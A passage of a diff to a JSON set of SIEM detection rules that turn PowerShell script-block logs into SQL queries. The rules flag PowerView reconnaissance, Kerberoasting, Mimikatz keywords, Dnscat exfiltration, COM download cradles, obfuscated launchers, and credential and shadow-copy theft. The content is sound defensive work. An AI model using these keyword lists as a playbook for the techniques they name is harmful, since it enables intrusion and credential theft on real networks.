'%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE 
'%$env:COR\\_ENABLE\\_PROFILING%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER\\_PATH%' ESCAPE '\\')" ], - "filename": "posh_ps_powerview_malicious_commandlets.yml" + "filename": "posh_ps_cor_profiler.yml" }, { - "title": "Dnscat Execution", - "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "title": "Automated Collection Bookmarks Using Get-ChildItem PowerShell", + "id": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", "status": "test", - "description": "Dnscat exfiltration tool execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1217" ], "falsepositives": [ - "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter Bookmarks%' ESCAPE '\\' AND ScriptBlockText LIKE '% -ErrorAction SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Force%' ESCAPE '\\')" ], - "filename": "posh_ps_dnscat_execution.yml" + 
"filename": "posh_ps_get_childitem_bookmarks.yml" }, { - "title": "PowerShell Credential Prompt", - "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", - "status": "test", - "description": "Detects PowerShell calling a credential prompt", - "author": "John Lambert (idea), Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", + "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -6454,9 +6025,9 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "posh_ps_prompt_credentials.yml" + "filename": "posh_ps_invoke_obfuscation_var.yml" }, { "title": "Troubleshooting Pack Cmdlet Execution", 
@@ -6478,77 +6049,81 @@ "filename": "posh_ps_susp_follina_execution.yml" }, { - "title": "Suspicious GetTypeFromCLSID ShellExecute", - "id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", - "status": "experimental", - "description": "Detects suspicious Powershell code that execute COM Objects", + "title": "Powershell Store File In Alternate Data Stream", + "id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "status": "test", + "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%::GetTypeFromCLSID(%' ESCAPE '\\' AND ScriptBlockText LIKE '%.ShellExecute(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath \"$env:comspec\" %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ArgumentList %' ESCAPE '\\' AND ScriptBlockText LIKE '%>%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_gettypefromclsid.yml" + "filename": "posh_ps_store_file_in_alternate_data_stream.yml" }, { - "title": "Potential COM Objects Download Cradles Usage - PS Script", - "id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", + "title": "Suspicious New-PSDrive to Admin Share", + "id": "1c563233-030e-4a07-af8c-ee0490a66d3a", "status": "experimental", - "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", + "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). 
The adversary may then perform actions as the logged-on user.", "author": "frack113", + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], "falsepositives": [ - "Legitimate use of the library" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (ScriptBlockText LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR ScriptBlockText LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR ScriptBlockText LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSDrive%' ESCAPE '\\' AND ScriptBlockText LIKE '%-psprovider %' ESCAPE '\\' AND ScriptBlockText LIKE '%filesystem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-root %' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND ScriptBlockText LIKE '%$%' ESCAPE '\\')" ], - "filename": "posh_ps_download_com_cradles.yml" + "filename": "posh_ps_susp_new_psdrive.yml" }, { - "title": "Malicious PowerShell Keywords", - "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "status": "test", - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf 
(source), Florian Roth (Nextron Systems)", + "title": "Disable Powershell Command History", + "id": "602f5669-6927-4688-84db-0d4b7afb2150", + "status": "experimental", + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "author": "Ali Alwashali", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Unknown" + "Legitimate script that disables the command history" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" ], - "filename": "posh_ps_malicious_keywords.yml" + "filename": "posh_ps_disable_psreadline_command_history.yml" }, { - "title": "Manipulation of User Computer or Group Security Principals Across AD", - "id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", - "status": "test", - "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "title": "Modify Group Policy Settings - ScriptBlockLogging", + "id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", + "status": "experimental", + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1136.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484.001" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.DirectoryServices.AccountManagement%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (ScriptBlockText LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%EnableSmartScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" ], - "filename": "posh_ps_directoryservices_accountmanagement.yml" + "filename": "posh_ps_modify_group_policy_settings.yml" }, { "title": "WMIC Unquoted Services Path Lookup - PowerShell", 
@@ -6570,661 +6145,630 @@ "filename": "posh_ps_wmi_unquoted_service_search.yml" }, { - "title": "Powershell File and Directory Discovery", - "id": "d23f2ba5-9da0-4463-8908-8ee47f614bb9", + "title": "Get-ADUser Enumeration Using UserAccountControl Flags", + "id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", "status": "test", - "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n", + "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", "author": "frack113", "tags": [ "attack.discovery", - "attack.t1083" + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\' AND ScriptBlockText LIKE '%useraccountcontrol%' ESCAPE '\\' AND ScriptBlockText LIKE '%-band%' ESCAPE '\\' AND ScriptBlockText LIKE '%4194304%' ESCAPE '\\')" ], - "filename": "posh_ps_file_and_directory_discovery.yml" + "filename": "posh_ps_as_rep_roasting.yml" }, { 
- "title": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock", - "id": "88f0884b-331d-403d-a3a1-b668cf035603", - "status": "test", - "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", - "author": "frack113", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR (ScriptBlockText LIKE '%get-aduser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-f %' ESCAPE '\\' AND ScriptBlockText LIKE '%-pr %' ESCAPE '\\' AND ScriptBlockText LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "posh_ps_susp_ad_group_reco.yml" + "filename": "posh_ps_invoke_obfuscation_clip.yml" }, { - "title": "Suspicious GPO Discovery With Get-GPO", - "id": "eb2fd349-ec67-4caa-9143-d79c7fb34441", - "status": "experimental", - "description": "Detect use of Get-GPO to get one GPO or all the 
GPOs in a domain.", + "title": "Suspicious Connection to Remote Account", + "id": "1883444f-084b-419b-ac62-e0d0c5b3693f", + "status": "test", + "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1615" + "attack.credential_access", + "attack.t1110.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-GPO%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.DirectoryServices.Protocols.LdapDirectoryIdentifier%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Net.NetworkCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.DirectoryServices.Protocols.LdapConnection%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_get_gpo.yml" + "filename": "posh_ps_susp_networkcredential.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "id": "22d80745-6f2c-46da-826b-77adaededd74", - "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious IO.FileStream", + "id": "70ad982f-67c8-40e0-a955-b920c2fa05cb", + "status": "test", + "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", + "author": "frack113", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1070.003" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%IO.FileStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\.\\\\\\*' ESCAPE '\\')" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" + "filename": "posh_ps_susp_iofilestream.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "title": "PowerShell Write-EventLog Usage", + "id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", "status": 
"experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.defense_evasion" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Write-EventLog%' ESCAPE '\\' AND ScriptBlockText LIKE '%-RawData %' ESCAPE '\\')" ], - "filename": "posh_ps_using_set_service_to_hide_services.yml" + "filename": "posh_ps_susp_write_eventlog.yml" }, { - "title": "Powershell Install a DLL in System Directory", - "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", + "id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", "status": "experimental", - "description": "Uses PowerShell to install/copy a a file into a 
system directory such as \"System32\" or \"SysWOW64\"", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1556.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%rundll32.exe%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ScriptBlockText LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "posh_ps_copy_item_system_directory.yml" + "filename": "posh_ps_invoke_obfuscation_via_rundll.yml" }, { - "title": "Windows Firewall Profile Disabled", - "id": "488b44e7-3781-4a71-888d-c95abfacf44d", - "status": "experimental", - "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", - "author": "Austin Songer @austinsonger", + "title": "AD Groups Or Users Enumeration Using PowerShell - ScriptBlock", + "id": "88f0884b-331d-403d-a3a1-b668cf035603", + "status": "test", + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this 
information to determine which users have elevated permissions, such as domain administrators.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Enabled %' ESCAPE '\\' AND ScriptBlockText LIKE '% False%' ESCAPE '\\' AND (ScriptBlockText LIKE '% -All %' ESCAPE '\\' OR ScriptBlockText LIKE '%Public%' ESCAPE '\\' OR ScriptBlockText LIKE '%Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Private%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR (ScriptBlockText LIKE '%get-aduser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-f %' ESCAPE '\\' AND ScriptBlockText LIKE '%-pr %' ESCAPE '\\' AND ScriptBlockText LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\')))" ], - "filename": "posh_ps_windows_firewall_profile_disabled.yml" + "filename": "posh_ps_susp_ad_group_reco.yml" }, { - "title": "Powershell Sensitive File Discovery", - "id": "7d416556-6502-45b2-9bad-9d2f05f38997", - "status": "experimental", - "description": "Detect adversaries enumerate sensitive files", + "title": "Create Volume Shadow Copy with Powershell", + "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "status": "test", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell 
scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.pass%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdbx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" ], - "filename": "posh_ps_sensitive_file_discovery.yml" + "filename": "posh_ps_create_volume_shadow_copy.yml" }, { - "title": "Dump Credentials from Windows Credential Manager With PowerShell", - "id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", - "status": "test", - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "author": "frack113", + "title": "Tamper Windows Defender - ScriptBlockLogging", + "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "status": "experimental", + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "author": "frack113, elhoim, Tim Shelton (fps, alias support)", "tags": 